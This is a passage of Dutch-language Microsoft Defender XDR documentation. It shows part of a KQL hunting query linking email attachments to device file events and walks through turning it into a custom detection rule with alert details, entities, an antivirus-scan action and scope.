| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

Een detectie maken

Zodra u een query hebt gemaakt die informatie identificeert waarover u een waarschuwing wilt ontvangen als deze zich in de toekomst voordoen, kunt u een aangepaste detectie maken op basis van de query.

Met aangepaste detecties wordt de query uitgevoerd op basis van de frequentie die u hebt ingesteld. De resultaten van de query's maken beveiligingswaarschuwingen op basis van de betrokken assets die u kiest. Deze waarschuwingen worden gecorreleerd aan incidenten en kunnen worden gesorteerd als elke andere beveiligingswaarschuwing die door een van de producten wordt gegenereerd.

  1. Verwijder op de querypagina regel 7 en 8 die zijn toegevoegd in stap 7 van de go-opsporingsinstructies en klik op Detectieregel maken.

    Een schermopname van de sectie Query bewerken van de pagina Geavanceerde opsporing in de Microsoft Defender portal.

    Opmerking

    Als u op Detectieregel maken klikt en de query syntaxisfouten bevat, wordt de detectieregel niet opgeslagen. Controleer uw query nog eens om er zeker van te zijn dat er geen fouten optreden.

  2. Vul de vereiste velden in met de informatie die het beveiligingsteam in staat stelt om de waarschuwing te begrijpen, waarom deze is gegenereerd en welke acties u verwacht te ondernemen.

    Een schermopname van de pagina Waarschuwingsgegevens in de Microsoft Defender portal.

    Zorg ervoor dat u de velden met duidelijkheid invult om de volgende gebruiker een geïnformeerde beslissing te geven over deze detectieregelwaarschuwing

  3. Selecteer welke entiteiten worden beïnvloed in deze waarschuwing. Selecteer in dit geval Apparaat en postvak.

    Een schermopname van de pagina met de details van de betrokken entiteiten in de Microsoft Defender-portal.

  4. Bepaal welke acties moeten worden uitgevoerd als de waarschuwing wordt geactiveerd. Voer in dit geval een antivirusscan uit, maar er kunnen andere acties worden uitgevoerd.

    Een schermopname van de pagina Acties in de Microsoft Defender portal.

  5. Selecteer het bereik voor de waarschuwingsregel. Omdat deze query apparaten omvat, zijn de apparaatgroepen relevant voor deze aangepaste detectie volgens Microsoft Defender voor Eindpunt context. Bij het maken van een aangepaste detectie die geen apparaten als beïnvloede entiteiten bevat, is het bereik niet van toepassing.

    Een schermopname van de pagina Bereik in de Microsoft Defender portal.

    Voor deze testfase wilt u deze regel mogelijk beperken tot een subset van testapparaten in uw productieomgeving.

  6. Selecteer Maken. Selecteer vervolgens Aangepaste detectieregels in het navigatievenster.

    Een schermopname van de optie Regels voor aangepaste detectieregels in de Microsoft Defender portal.

    Een schermopname van de pagina met de detectieregels en uitvoeringsdetails in de Microsoft Defender portal.

    Op deze pagina kunt u de detectieregel selecteren, waarmee een detailpagina wordt geopend.

    Een schermopname van de pagina met details van de geactiveerde waarschuwingen in de Microsoft Defender portal.

Deskundige training over geavanceerde opsporing

Het bijhouden van de aanvaller is een webcastserie voor nieuwe beveiligingsanalisten en doorgewinterde bedreigingsjagers. Het begeleidt u door de basisbeginselen van geavanceerde opsporing, helemaal tot het maken van uw eigen geavanceerde query's.

Zie Krijg een deskundige training over geavanceerde opsporing om aan de slag te gaan.

Volgende stap

Neem informatie uit Onderzoeken en reageren met Microsoft Defender XDR op in uw SecOps-processen.